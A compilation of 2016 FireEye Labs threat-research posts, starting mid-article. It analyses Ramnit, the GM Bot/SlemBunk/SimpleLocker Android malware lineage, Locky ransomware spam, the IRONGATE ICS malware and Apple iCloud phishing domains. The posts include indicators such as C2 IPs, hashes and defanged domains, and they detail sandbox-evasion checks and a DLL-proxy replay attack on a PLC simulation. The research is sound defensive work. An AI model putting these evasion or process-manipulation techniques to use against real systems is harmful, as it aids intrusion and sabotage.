Successful execution of the VBScript and the delivery of W32.Ramnit onto the victim’s machine depends on the user’s browser, as well as the browser’s setting. Since Chrome and Firefox do not support client-side VBScript, only IE users are susceptible to this attack.

Fortunately, recent versions of IE do not run code automatically by default. Instead, users will see two popup warnings when the browser is rendering potentially dangerous objects such as ActiveX components, as shown in Figure 4 and Figure 5.

Figure 4: First warning for blocked content in IE 11

Figure 5: Second warning for blocked content in IE 11

Only when the victim clicks on “Yes” will the browser execute the blocked content. In this case, the IE executes the VBScript, drops the payload, and executes it in the background while the user simply sees the usual news page.

As long as users click “No” to disallow ActiveX components, they will remain safe from W32.Ramnit. However, this type of social engineering continues to be successful. When a legitimate site is compromised to host exploits or malware, the positive reputation of the site is leveraged to trick users into clicking “Yes” and becoming infected. The potential impact of this particular threat is compounded by the fact that the compromised site is ranked in the Alexa Top 100 for most visited sites internationally, and is in the Top 25 for most popular websites in China [1].

FireEye appliances detect this infection at multiple levels. FireEye’s multiflow detection traces out the complete attack chain, as well as CnC communication. While the CnC host has been suspended for a long time, the worm’s presence alone can be a pain for the victim because it adds itself into all HTML files that it can access. Additionally, it adds itself to the startup registry and impacts the machine’s performance.

So the question that you need to ask yourself is this: If a Top 100 Alexa domain is still infected by this veteran malware, are you?

A Growing Number of Android Malware Families Believed to Have a Common Origin: A Study Based on Binary Code

By: Wu Zhou
11 March 2016 at 15:04

Introduction

On Feb. 19, IBM XForce researchers released an intelligence report [1] stating that the source code for GM Bot was leaked to a crimeware forum in December 2015. GM Bot is a sophisticated Android malware family that emerged in the Russian-speaking cybercrime underground in late 2014. IBM also claimed that several Android malware families recently described in the security community were actually variants of GM Bot, including Bankosy[2], MazarBot[3], and the SlemBunk malware recently described by FireEye[4, 5].

Security vendors may differ in their definition of a malware “variant.” The term may refer to anything from almost identical code with slight modifications, to code that has superficial similarities (such as similar network traffic) yet is otherwise very different.

Using IBM’s reporting, we compared their GM Bot samples to SlemBunk. Based on the disassembled code of these two families, we agree that there are enough code similarities to indicate that GM Bot shares a common origin with SlemBunk. Interestingly, our research led us to identify an earlier malware family named SimpleLocker – the first known file-encryption ransomware on Android [6] – that also shares a common origin with these banking trojan families.

GM Bot and SlemBunk

Our analysis showed that the four GM Bot samples referenced by IBM researchers all share the same major components as SlemBunk. Figure 1 of our earlier report [4] is reproduced here, which shows the major components of SlemBunk and its corresponding class names:

  • ServiceStarter: An Android receiver that will be invoked once an app is launched or the device boots up. Its functionality is to start the monitoring service, MainService, in the background.
  • MainService: An Android service that runs in the background and monitors all running processes on the device. It prompts the user with an overlay view that resembles the legitimate app when that app is launched. This monitoring service also communicates with a remote host by sending the initial device data and notifying of device status and app preferences.
  • MessageReceiver: An Android receiver that handles incoming text messages. In addition to the functionality of intercepting the authentication code from the bank, this component also acts as the bot client for remote command and control (C2).
  • MyDeviceAdminReceiver: A receiver that requests administrator access to the Android device the first time the app is launched. This makes the app more difficult to remove.
  • Customized UI views: Activity classes that present fake login pages that mimic those of the real banking apps or social apps to phish for banking or social account credentials.

Figure 1. Major components of SlemBunk malware family

The first three GM Bot samples have the same package name as our SlemBunk sample. In addition, the GM Bot samples have five of the same major components, including the same component names, as the SlemBunk sample in Figure 1.

The fourth GM Bot sample has a different initial package name, but unpacks the real payload at runtime. The unpacked payload has the same major components as the SlemBunk sample, with a few minor changes on the class names: MessageReceiver replaced with buziabuzia, and MyDeviceAdminReceiver replaced with MDRA.

Figure 2. Code Structure Comparison between GM Bot and SlemBunk

Figure 2 shows the code structure similarity between one GM Bot sample and one SlemBunk sample (SHA256 9425fca578661392f3b12e1f1d83b8307bfb94340ae797c2f121d365852a775e and SHA256 e072a7a8d8e5a562342121408493937ecdedf6f357b1687e6da257f40d0c6b27 for GM Bot and SlemBunk, respectively). From this figure, we can see that the five major components we discussed in our previous post [4] are also present in GM Bot sample. Other common classes include:

  • Main, the launching activity of both samples.
  • MyApplication, the application class that starts before any other activities of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.

Among all the above components and classes, MainService is the most critical one. It is started by class Main at the launching time, keeps working in the background to monitor the top running process, and overlays a phishing view when a victim app (e.g., some mobile banking app) is recognized. To keep MainService running continuously, malware authors added two receivers – ServiceStarter and SDCardServiceStarter – to check its status when particular system events are received. Both GM Bot and SlemBunk samples share the same architecture. Figure 3 shows the major code of class SDCardServiceStarter to demonstrate how GM Bot and SlemBunk use the same mechanism to keep MainService running.

Figure 3. Method onReceive of SDCardServiceStarter for GM Bot and SlemBunk

From this figure, we can see that GM Bot and SlemBunk use almost identical code to keep MainService running. Note that both samples check the country in system locale and avoid starting MainService when they find the country is Russia. The only difference is that GM Bot applies renaming obfuscation to some classes, methods and fields. For example, static variable “MainService;->a” in GM Bot has the same role as static variable “MainService;->isRunning” in SlemBunk. Malware authors commonly use this trick to make their code harder to understand. However this won’t change the fact that the underlying codes share the same origin.

Figure 4 shows the core code of class MainService to demonstrate that GM Bot and SlemBunk actually have the same logic for main service. In Android, when a service is started its onCreate method will be called. In method onCreate of both samples, a static variable is first set to true. In GM Bot, this variable is named “a”, while in SlemBunk it is named “isRunning”. Then both will move forward to read an app particular preference. Note that the preferences in both samples have the same name: “AppPrefs”. The last tasks of these two main services are also the same. Specifically, in order to check whether any victim apps are running, a runnable thread is scheduled. If a victim app is running, a phishing view is overlaid on top of that of the victim app. The only difference here is also on the naming of the runnable thread. Class “d” in GM Bot and class “MainService$2” in SlemBunk are employed respectively to conduct the same credential phishing task.

Figure 4. Class MainService for GM Bot and SlemBunk

In summary, our investigation into the binary code similarities supports IBM’s assertion that GM Bot and SlemBunk share the same origin.

SimpleLocker and SlemBunk

IBM noted that GM Bot emerged in late 2014 in the Russian-speaking cybercrime underground. In our research, we noticed that an earlier piece of Android malware named SimpleLocker also has a code structure similar to SlemBunk and GM Bot. However, SimpleLocker has a different financial incentive: to demand a ransom from the victim. After landing on an Android device, SimpleLocker scans the device for certain file types, encrypts them, and then demands a ransom from the user in order to decrypt the files. Before SimpleLocker’s emergence, there were other types of Android ransomware that would lock the screen; however, SimpleLocker is believed to be the first file-encryption ransomware on Android.

The earliest report on SimpleLocker we identified was published by ESET in June 2014 [6]. However, we found an earlier sample in our malware database from May 2014 (SHA256 edff7bb1d351eafbe2b4af1242d11faf7262b87dfc619e977d2af482453b16cb). The compile date of this app was May 20, 2014. We compared this SimpleLocker sample to one of our SlemBunk samples (SHA256 f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96) using the same methods used to compare GM Bot and SlemBunk.

Figure 5 shows the code structure comparison between these two samples. Note that this SimpleLocker variant also has the major components ServiceStarter and MainService, both used by SlemBunk. However, the purpose of the main service here is not to monitor running apps and provide phishing UIs to steal banking credentials. Instead, SimpleLocker’s main service component scans the device for victim files and calls the file encryption class to encrypt files and demand a ransom. The major differences in the SimpleLocker code are shown in the red boxes: AesCrypt and FileEncryptor. Other common classes include:

  • Main, the launching activity of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.
  • Tor and OnionKit, third-party libraries for private communication.
  • TorSender, HttpSender and Utils, supporting classes to provide code for CnC communication and for collecting device information.

Figure 5. Code structure comparison between SimpleLocker and SlemBunk samples

Finally, we located another SimpleLocker sample (SHA256 304efc1f0b5b8c6c711c03a13d5d8b90755cec00cac1218a7a4a22b091ffb30b) from July 2014, about two months after the first SimpleLocker sample. This new sample did not use Tor for private communications, but shared four of the five major components as the SlemBunk sample (SHA256: f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96). Figure 6 shows the code structure comparison between these two samples.

Figure 6. Code structure comparison between SimpleLocker and SlemBunk variants

As we can see in Figure 6, the new SimpleLocker sample used a packaging mechanism similar to SlemBunk, putting HttpSender and Utils into a sub-package named “utils”. It also added two other major components that were originally only seen in SlemBunk: MessageReceiver and MyDeviceAdminReceiver. In total, this SimpleLocker variant shares four out of five major components with SlemBunk.

Figure 7 shows the major code of MessageReceiver in the previous samples to demonstrate that SimpleLocker and SlemBunk use basically the same process and logic to communicate with the CnC server. First, class MessageReceiver registers itself to handle incoming short messages, whose arrival will trigger its method onReceive. As seen from the figure, the main logics here are basically the same for SimpleLocker and SlemBunk. They first read the value of a particular key from app preferences. Note that the names for the key and shared preference are the same for these two different malware families: key is named “CHECKING_NUMBER_DONE” and preference named “AppPrefs”.  The following steps call method retrieveMessage to retrieve the short messages, and then forward the control flow to class SmsProcessor. The only difference here is that SimpleLocker adds one extra method named processControlCommand to forward control flow.

Class SmsProcessor defines the CnC commands supported by the malware families. Looking into class SmsProcessor, we identified more evidence that SimpleLocker and SlemBunk are of the same origin. First, the CnC commands supported by SimpleLocker are actually a subset of those supported by SlemBunk. In SimpleLocker, CnC commands include "intercept_sms_start", "intercept_sms_stop", "control_number" and "send_sms", all of which are also present in SlemBunk sample. What is more, in both SimpleLocker and SlemBunk there is a common prefix “#” before the actual CnC command. This kind of peculiarity is a good indicator that SimpleLocker and SlemBunk share a common origin.

Figure 7. Class MessageReceiver for SimpleLocker and SlemBunk variants

The task of class MyDeviceAdminReceiver is to request device administrator privilege, which makes these malware families harder to remove. SimpleLocker and SlemBunk are also highly similar in this respect, supporting the same set of device admin relevant functionalities.

At this point, we can see that these variants of SimpleLocker and SlemBunk share four out of five major components and share the same supporting utilities. The only difference is in the final payload, with SlemBunk phishing for banking credentials while SimpleLocker encrypts certain files and demands ransom. This leads us to believe that SimpleLocker came from the same original code base as SlemBunk.

Conclusion

Our analysis confirms that several Android malware families share a common origin, and that the first known file-encrypting ransomware for Android – SimpleLocker – is based on the same code as several banking trojans. Additional research may identify other related malware families.

Individual developers in the cybercrime underground have been proficient in writing and customizing malware. As we have shown, malware with specific and varied purposes can be built on a large base of shared code used for common functions such as gaining administrative privileges, starting and restarting services, and CnC communications. This is apparent simply from looking at known samples related to GM Bot – from SimpleLocker that is used for encryption and ransomware, to SlemBunk that is used as a banking Trojan and for credential theft, to the full-featured MazarBot backdoor.

With the leak of the GM Bot source code, the number of customized Android malware families based on this code will certainly increase. Binary code-based study, one of FireEye Labs’ major research tools, can help us better characterize and track malware families and their relationships, even without direct access to the source code. Fortunately, the similarities across these malware families make them easier to identify, ensuring that FireEye customers are well protected.

References:

[1]. Android Malware About to Get Worse: GM Bot Source Code Leaked
[2]. Android.Bankosy: All ears on voice call-based 2FA
[3]. MazarBOT: Top class Android datastealer
[4]. SLEMBUNK: AN EVOLVING ANDROID TROJAN FAMILY TARGETING USERS OF WORLDWIDE BANKING APPS
[5]. SLEMBUNK PART II: PROLONGED ATTACK CHAIN AND BETTER-ORGANIZED CAMPAIGN
[6]. ESET Analyzes Simplocker – First Android File-Encrypting, TOR-enabled Ransomware

 

Surge in Spam Campaign Delivering Locky Ransomware Downloaders

25 March 2016 at 12:00

FireEye Labs is detecting a significant spike in Locky ransomware downloaders due to a pair of concurrent email spam campaigns impacting users in over 50 countries. Some of the top affected countries are depicted in Figure 1.

Figure 1. Affected countries

As seen in Figure 2, the steep spike starts on March 21, 2016, where Locky is running campaigns that coincide with the new Dridex campaigns that were discussed in the blog, “Stop Scanning My Macro”.

Figure 2. Detection on spam delivered malware

Prior to Locky’s emergence in February 2016, Dridex was known to be responsible for a relatively higher volume of email spam campaigns. However, as shown in Figure 3, we can see that Locky is catching up with Dridex’s spam activities. This is especially true for this week, as we are seeing more Locky-related spam themes than Dridex. On top of that, we also are seeing Dridex and Locky running campaigns on the same day, which resulted in an abnormal detection spike.

Figure 3. Dridex versus Locky spam campaign over time

Locky Ransomware spam 

The new Locky spam campaign uses several themes such as “invoice notice”, “attached image”, and “attached document themes”. See Figure 4 and Figure 5 for example campaign emails.

Figure 4. Urgent Invoice Campaign

Figure 5. Other Campaigns

The ZIP attachment as depicted in Figure 6 contains a malicious JavaScript downloader that downloads and installs the Locky ransomware.

Figure 6. Zipped Content

In Figure 7, it is interesting to see that the recent Locky campaign seems to prefer using a JavaScript-based downloader in comparison to Microsoft Word and Excel macro-based downloaders, which were seen being used in its early days.

Figure 7. Locky Downloader Mechanism

The preference for JavaScript downloaders could be due to the ease to transform or obfuscate the script via automation to generate new variants as depicted in Figure 8. As a result, the traditional signature-based solution may not keep up with the variants where its behavioral intent is the same. At the time of discovery, most of the samples that we see are being detected by only one vendor, according to VirusTotal.

Figure 8. Obfuscated JavaScript code

Conclusions

The volume of Locky ransomware downloaders observed is increasing and it may potentially replace the Dridex downloader as the top spammer. One of the latest victims of Locky is Methodist Hospital[1], where the victim was reportedly forced to pay a ransom to retrieve their encrypted data. This suggests that the cybercriminals are earning more from ransomware and this drives their aggressive campaigns.

On top of that, JavaScript downloaders seem to be the preferred medium for delivering its payload as it could be easily obfuscated to create new variants.

Technical Analysis of a Locky Payload Sample

MD5 Sum: 3F118D0B888430AB9F58FC2589207988 (First seen on 2016-02-24 in VirusTotal)

Persistence Mechanism
  • The malware does not contain a persistence mechanism. An external tool or installer is required if the attacker desires persistence.
  • The malware contains the ability to install the following registry key for persistence; this functionality is disabled in this variant.
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Locky
      • <path_to_malware>
File System Artifacts
  • The malware encrypts files on the system and creates new files with the encrypted contents in the same directory with the following naming convention:
    • <system identifier><16 random hex digits>.locky
    • The <system identifier> value is the ASCII hexadecimal representation of the first eight bytes of the MD5 hash of the GUID of the system volume.
  • The malware drops a ransom note provided by the C2 server in all directories with encrypted files and on the desktop of the current user:
    • _Locky_recover_instructions.txt
  • The malware drops an image on the desktop of the current user:
    • _Locky_recover_instructions.bmp
Registry Artifacts
  • The malware creates the registry key HKCU\Software\Locky.
    • id is set to a unique identifier generated for the compromised system.
    • pubkey is set to a binary buffer that contains a public RSA key.
    • paytext is set to a binary buffer containing the recovery instructions.
    • completed is set to 1.
  • The malware changes the desktop background to a bitmap containing the ransom instructions.
    • HKCU\Control Panel\Desktop\Wallpaper is set to: %CSIDL_DESKTOPDIRECTORY%\_Locky_recover_instructions.bmp

Network-Based Signatures

Command and Control (CnC)
  • The malware communicates with the following hard-coded hosts using HTTP over TCP port 80. The malware also uses a domain name generation algorithm as described below.
    • 188.138.88.184
    • 31.41.47.37
    • 5.34.183.136
    • 91.121.97.170
Beacon Packet
  • The malware beacon builds a HTTP POST request to /main.php as shown in Figure 9. The POST data is encoded using a custom algorithm.

Figure 9. HTTP POST request polling packet (general packet structure)

Domain Generation Algorithm (DGA)

This sample contains a domain name generation algorithm that is based on the current month, day and year. There are eight possible domains per day and the domains change on the first of the month and on even numbered days. Figure 10 contains Python code to generate the eight possible domain names for the current date.

 


Figure 10. Locky Domain Generation Algorithm

[1] http://arstechnica.com/security/2016/03/kentucky-hospital-hit-by-ransomware-attack/

 

 

 

 

 

 

 

 

IRONGATE ICS Malware: Nothing to See Here...Masking Malicious Activity on SCADA Systems

2 June 2016 at 12:00

In the latter half of 2015, the FireEye Labs Advanced Reverse Engineering (FLARE) team identified several versions of an ICS-focused malware crafted to manipulate a specific industrial process running within a simulated Siemens control system environment. We named this family of malware IRONGATE.

FLARE found the samples on VirusTotal while researching droppers compiled with PyInstaller — an approach used by numerous malicious actors. The IRONGATE samples stood out based on their references to SCADA and associated functionality. Two samples of the malware payload were uploaded by different sources in 2014, but none of the antivirus vendors featured on VirusTotal flagged them as malicious.

Siemens Product Computer Emergency Readiness Team (ProductCERT) confirmed that IRONGATE is not viable against operational Siemens control systems and determined that IRONGATE does not exploit any vulnerabilities in Siemens products. We are unable to associate IRONGATE with any campaigns or threat actors. We acknowledge that IRONGATE could be a test case, proof of concept, or research activity for ICS attack techniques.

Our analysis finds that IRONGATE invokes ICS attack concepts first seen in Stuxnet, but in a simulation environment. Because the body of industrial control systems (ICS) and supervisory control and data acquisition (SCADA) malware is limited, we are sharing details with the broader community.

Malicious Concepts

Deceptive Man-in-the-Middle

IRONGATE's key feature is a man-in-the-middle (MitM) attack against process input-output (IO) and process operator software within industrial process simulation. The malware replaces a Dynamic Link Library (DLL) with a malicious DLL, which then acts as a broker between a PLC and the legitimate monitoring software. This malicious DLL records five seconds of 'normal' traffic from a PLC to the user interface and replays it, while sending different data back to the PLC. This could allow an attacker to alter a controlled process unbeknownst to process operators.

Sandbox Evasion

IRONGATE's second notable feature involves sandbox evasion. Some droppers for the IRONGATE malware would not run if VMware or Cuckoo Sandbox environments were employed. The malware uses these techniques to avoid detection and resist analysis, and developing these anti-sandbox techniques indicates that the author wanted the code to resist casual analysis attempts. It also implies that IRONGATE’s purpose was malicious, as opposed to a tool written for other legitimate purposes.

Dropper Observables

We first identified IRONGATE when investigating droppers compiled with PyInstaller — an approach used by numerous malicious actors. In addition, strings found in the dropper include the word “payload”, which is commonly associated with malware.

Unique Features for ICS Malware

While IRONGATE malware does not compare to Stuxnet in terms of complexity, ability to propagate, or geopolitical implications, IRONGATE leverages some of the same features and techniques Stuxtnet used to attack centrifuge rotor speeds at the Natanz uranium enrichment facility; it also demonstrates new features for ICS malware.

  • Both pieces of malware look for a single, highly specific process.
  • Both replace DLLs to achieve process manipulation.
  • IRONGATE detects malware detonation/observation environments, whereas Stuxnet looked for the presence of antivirus software.
  • IRONGATE actively records and plays back process data to hide manipulations, whereas Stuxnet did not attempt to hide its process manipulation, but suspended normal operation of the S7-315 so even if rotor speed had been displayed on the HMI, the data would have been static.

A Proof of Concept

IRONGATE’s characteristics lead us to conclude that it is a test, proof of concept, or research activity.

  • The code is specifically crafted to look for a user-created DLL communicating with the Siemens PLCSIM environment. PLCSIM is used to test PLC program functionality prior to in-field deployment. The DLLs that IRONGATE seeks and replaces are not part of the Siemens standard product set, but communicate with the S7ProSim COM object. Malware authors test concepts using commercial simulation software.
  • Code in the malicious software closely matched usage on a control engineering blog dealing with PLCSIM (https://alexsentcha.wordpress.com/using-s7-prosim-with-siemens-s7-plcsim/ and https://pcplcdemos.googlecode.com/hg/S7PROSIM/BioGas/S7%20v5.5/).
  • While we have identified and analyzed several droppers for the IRONGATE malware, we have yet to identify the code’s infection vector.
  • In addition, our analysis did not identify what triggers the MitM payload to install; the scada.exe binary that deploys the IRONGATE DLL payload appears to require manual execution.
  • We have not identified any other instances of the ICS-specific IRONGATE components (scada.exe and Step7ProSim.dll), despite their having been compiled in September of 2014.
  • Siemens ProductCERT has confirmed that the code would not work against a standard Siemens control system environment.

Implications for ICS Asset Owners

Even though process operators face no increased risk from the currently identified members of the IRONGATE malware family, IRONGATE provides valuable insight into adversary mindset.

Network security monitoring, indicator of compromise (IoC) matching, and good practice guidance from vendors and other stakeholders represent important defensive techniques for ICS networks.

To specifically counter IRONGATE’s process attack techniques, ICS asset owners may, over the longer term, implement solutions that:

  • Require integrity checks and code signing for vendor and user generated code. Lacking cryptographic verification facilitates file replacement and MitM attacks against controlled industrial processes.
  • Develop mechanisms for sanity checking IO data, such as independent sensing and backhaul, and comparison with expected process state information. Ignorance of expected process state facilitates an attacker’s ability to achieve physical consequence without alarming operators.

Technical Malware Analysis

IRONGATE Dropper Family

FireEye has identified six IRONGATE droppers: bla.exe, update.exe1, update_no_pipe.exe1, update_no_pipe.exe2, update_no_pipe.exe2, update.exe3. All but one of these Python-based droppers first checks for execution in a VMware or Cuckoo Sandbox environment. If found, the malware exits.

If not found, the IRONGATE dropper extracts a UPX-packed, publicly available utility (NirSoft NetResView version 1.27) to audiodg.exe in the same directory as the dropper. The dropper then executes the utility using the command audiodg.exe /scomma scxrt2.ini. This command populates the file scxrt2.ini with a comma-separated list of network resources identified by the host system.

The dropper iterates through each entry in scxrt2.ini, looking for paths named move-to-operational or move-to-operational.lnk. If a path is found, the dropper first extracts the Base64-encoded .NET executable scada.exe to the current directory and then moves the file to the path containing move-to-operational or move-to-operational.lnk. The path move-to-operational is interesting as well, perhaps implying that IRONGATE was not seeking the actual running process, but rather a staging area for code promotion. The dropper does not execute the scada.exe payload after moving it.

Anti-Analysis Techniques

Each IRONGATE dropper currently identified deploys the same .NET payload, scada.exe. All but one of the droppers incorporated anti-detection/analysis techniques to identify execution in VMware or the Cuckoo Sandbox. If such environments are detected, the dropper will not deploy the .NET executable (scada.exe) to the host.

Four of the droppers (update.exe1, update_no_pipe.exe1, update_no_pipe.exe2, and update.exe3) detect Cuckoo environments by scanning subdirectories of the %SystemDrive%. Directories with names greater than five, but fewer than ten characters are inspected for the subdirectories drop, files, logs, memory, and shots. If a matching directory is found, the dropper does not attempt to deploy the scada.exe payload.

The update.exe1 and update.exe3 droppers contain code for an additional Cuckoo check using the SysInternals pipelist program, install.exe, but the code is disabled in each.

The update.exe2 dropper includes a check for VMware instead of Cuckoo. The VMWare check looks for the registry key HKLM\SOFTWARE\VMware, Inc.\VMware Tools and the files %WINDIR%\system32\drivers\vmmouse.sys and %WINDIR%\system32\drivers\vmhgfs.sys. If any of these are found, the dropper does not attempt to deploy the scada.exe payload.

The dropper bla.exe does not include an environment check for either Cuckoo or VMware.

scada.exe Payload

We surmise that scada.exe is a user-created payload used for testing the malware. First, our analysis did not indicate what triggers scada.exe to run. Second, Siemens ProductCERT informed us that scada.exe is not a default file name associated with Siemens industrial control software.

When scada.exe executes, it scans drives attached to the system for filenames ending in Step7ProSim.dll. According to the Siemens ProductCERT, Step7ProSim.dll is not part of the Siemens PLCSIM software. We were unable to determine whether this DLL was created specifically by the malware author, or if it was from another source, such as example code or a particular custom ICS implementation. We surmise this DLL simulates generation of IO values, which would normally be provided by an S7-based controller, since the functions it includes appear derived from the Siemens PLCSIM environment.

If scada.exe finds a matching DLL file name, it kills all running processes with the name biogas.exe. The malware then moves Step7ProSim.dll to Step7ConMgr.dll and drops a malicious Step7ProSim.dll – the IRONGATE payload – to the same directory.

The malicious Step7ProSim.dll acts as an API proxy between the original user-created Step7ProSim.dll (now named Step7ConMgr.dll) and the application biogas.exe that loads it. Five seconds after loading, the malicious Step7ProSim.dll records five seconds of calls to ReadDataBlockValue. All future calls to ReadDataBlockValue return the recorded data.

Simultaneously, the malicious DLL discards all calls to WriteDataBlockValue and instead calls WriteInputPoint(0x110, 0, 0x7763) and WriteInputPoint(0x114, 0, 0x7763) every millisecond. All of these functions are named similarly to Siemens S7ProSim v5.4 COM interface. It appears that other calls to API functions are passed through the malicious DLL to the legitimate DLL with no other modification.

Biogas.exe

As mentioned previously, IRONGATE seeks to manipulate code similar to that found on a blog dealing with simulating PLC communications using PLCSIM, including the use of an executable named biogas.exe.

Examination of the executable from that blog’s demo code shows that the WriteInputPoint function calls with byte indices 0x110 and 0x114 set pressure and temperature values, respectively:

IRONGATE:

         WriteInputPoint(0x110, 0, 0x7763)
WriteInputPoint(0x114, 0, 0x7763)

 Equivalent pseudo code from Biogas.exe: 

        S7ProSim.WriteInputPoint(0x110, 0, (short)this.Pressure.Value)
     S7ProSim.WriteInputPoint(0x114, 0, (short)this.Temperature.Value)

We have been unable to determine the significance of the hardcoded value 0x7763, which is passed in both instances of the write function.

Because of the noted indications that IRONGATE is a proof of concept, we cannot conclude IRONGATE’s author intends to manipulate specific temperature or pressure values associated with the specific biogas.exe process, but find the similarities to this example code striking.

Artifacts and Indicators

PyInstaller Artifacts

The IRONGATE droppers are Python scripts converted to executables using PyInstaller. The compiled droppers contain PyInstaller artifacts from the system the executables were created on. These artifacts may link other samples compiled on the same system. Five of the six file droppers (bla.exe, update.exe1, update_no_pipe.exe1, update_no_pipe.exe2 and update.exe3) all share the same PyInstaller artifacts listed in Table 1.

Table 1: Pyinstaller Artifacts

The remaining dropper, update.exe2, contains the artifacts listed in Table 2.

Table 2: Pyinstaller Artifacts for update.exe2

Unique Strings

Figure 1 and 2 list the unique strings discovered in the scada.exe and Step7ProSim.dll binaries.

Figure 1: Scada.exe Unique Strings

Figure 2: Step7ProSim.dll Unique Strings

File Hashes

Table 3 contains the MD5 hashes, file and architecture type, and compile times for the malware analyzed in this report.

Table 3: File MD5 Hashes and Compile Times

FireEye detects IRONGATE. A list of indicators can be found here.

Special thanks to the Siemens ProductCERT for providing support and context to this investigation.

Rotten Apples: Apple-like Malicious Phishing Domains

7 June 2016 at 12:00

At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some phishing domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These phony Apple domains were involved in phishing attacks against Apple iCloud users in China and UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique as they are serving the same malicious phishing content from different domains to target Apple users.

Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer.

iCloud ensures that users always have the latest versions of their important information –  including documents, photos, notes, and contacts – on all of their Apple devices. iCloud provides an easy interface to share photos, calendars, locations and more with friends and family, and even helps users find their device if they lose it. Perhaps most importantly, its iCloud Keychain feature allows user to store passwords and credit card information and have it entered automatically on their iOS devices and Mac computers.

Anyone with access to an Apple ID, password and some additional information, such as date of birth and device screen lock code, can completely take over the device and use the credit card information to impersonate the user and make purchases via the Apple Store.

This blog highlights some highly organized and sophisticated phishing attack campaigns we observed targeting Apple customers.

Campaign 1: Zycode phishing campaign targeting Apple's Chinese Customers

This phishing kit is named “zycode” after the value of a password variable embedded in the JavaScript code which all these domains serve in their HTTP responses.

The following is a list of phishing domains targeting Apple users detected by our automated system in March 2016. None of these domains are registered by Apple, nor are they pointing to Apple infrastructure:

The list shows that the attackers are attempting to mimic websites related to iTunes, iCloud and Apple ID, which are designed to lure and trick victims into submitting their Apple IDs.

Most of these domains appeared as an Apple login interface for Apple ID, iTunes and iCloud. The domains were serving highly sophisticated, obfuscated and suspicious JavaScripts, which was creating the phishing HTML content on the web page. This technique is effective against anti-phishing systems that rely on the HTML content and analyze the forms.

From March 7 to March 12, the following domains used for Apple ID phishing were observed, all of which were registered by a few entities in China using a qq[.]com email address: iCloud-Apple-apleid[.]com, Appleid-xyw[.]com, itnues-appid[.]com, AppleidApplecwy[.]com, appie-itnues[.]com, AppleidApplecwy[.]com, Appleid-xyw[.]com, Appleid-yun-iCloud[.]com, iCloud-Apple-apleid[.]com, iphone-ioslock[.]com, iphone-appdw[.]com.

From March 13 to March 20, we observed these new domains using the exact same phishing content, and having similar registrants: iCloud-Appleid-yun[.]win, iClouddd[.]top, iCloudee[.]top, iCloud-findip[.]com, iCloudhh[.]top, ioslock-Apple[.]com, ioslock-iphone[.]com, iphone-iosl0ck[.]com, lcloudmid[.]com

On March 30, we observed the following newly registered domains serving this same content: iCloud-mail-Apple[.]com, Apple-web-icluod[.]com, Apple-web-icluodid[.]com, AppleidAppleiph[.]com , icluod-web-ios[.]com and ios-web-Apple[.]com

Phishing Content and Analysis

Phishing content is usually available in the form of simple HTML, referring to images that mimic a target brand and a form to collect user credentials. Phishing detection systems look for special features within the HTML content of the page, which are used to develop detection heuristics. This campaign is unique as a simple GET request to any of these domains results in an encoded JavaScript content in the response, which does not reveal its true intention unless executed inside a web browser or a JavaScript emulator. For example, the following is a brief portion of the encoded string taken from the code.

This encoded string strHTML goes through a complex sequence of around 23 decrypting/decoding functions that include number system conversions, pseudo-random pattern modifiers followed by XOR decoding using a fixed key or password “zycode” for the actual HTML phishing content to be finally created (refer to Figure 15 and Figure 16 in Appendix 1 for complete code). Phishing detection systems that rely solely on the HTML in the response section will completely fail to detect the code generated using this technique.

Once loaded into the web browser, this obfuscated JavaScript creates an iCloud phishing page. This page is shown in Figure 1.

Figure 1: The page created by the obfuscated JavaScript as displayed in the browser

The page is created by the de-obfuscated content seen in Figure 2.

Figure 2: Deobfuscated content

Burp Suite is a tool to secure and penetrate web applications: https://portswigger[.]net/burp/.  The Burp session of a user supplying login and password to the HTML form is shown in Figure 3. Here we can see 5 variables (u,p,x,y and cc) and a cookie being sent via HTTP POST method to the page save.php.

Figure 3: Burp session

After the user enters a login and password, they are redirected and presented with the following Chinese Apple page, seen in Figure 4:  http://iClouddd[.]top/ask2.asp?MNWTK=25077126670584.html

Figure 4: Phishing page

On this page, all the links correctly point towards Apple[.]com, as can be seen in the HTML:

  * Apple <http://www.Apple[.]com/cn/>
  * <http://www.Apple[.]com/cn/shop/goto/bag>
  * Apple <http://www.Apple[.]com/cn/>
  * Mac <http://www.Apple[.]com/cn/mac/>
  * iPad <http://www.Apple[.]com/cn/ipad/>
  * iPhone <http://www.Apple[.]com/cn/iphone/>
  * Watch <http://www.Apple[.]com/cn/watch/>
  * Music <http://www.Apple[.]com/cn/music/>
  * <http://www.Apple[.]com/cn/support/>
  * Apple[.]com <http://www.Apple[.]com/cn/search>
  * <http://www.Apple[.]com/cn/shop/goto/bag>

Apple ID <https://Appleid.Apple[.]com/account/home>

  * <https://Appleid.Apple[.]com/zh_CN/signin>
  * Apple ID <https://Appleid.Apple[.]com/zh_CN/account>
  * <https://Appleid.Apple[.]com/zh_CN/#!faq>

When translated using Google Translate, the Chinese text written in the middle of the page (Figure 4) reads: “Verify your birth date or your device screen lock to continue”.

Next the user was presented with an ask3.asp webpage shown in Figure 5.

 

Figure 5: Phishing form asking for more details from victims

Translation: “Please verify your security question”

As shown in Figure 5, the page asks the user to answer three security questions, followed by redirection to an ok.asp page (Figure 6) on the same domain:

Figure 6: Successful submission phishing page

The final link points back to Apple[.]com. The complete trail using Burp suite tool is shown in Figure 7.

Figure 7: Burp session

We noticed that if the user tried to supply the same Apple ID twice, they got redirected to the page save[.]asp shown in Figure 8. Clicking OK on the popup redirected the user back to the main page.

Figure 8: Error prompt generated by phishing page

Domain Registration Information

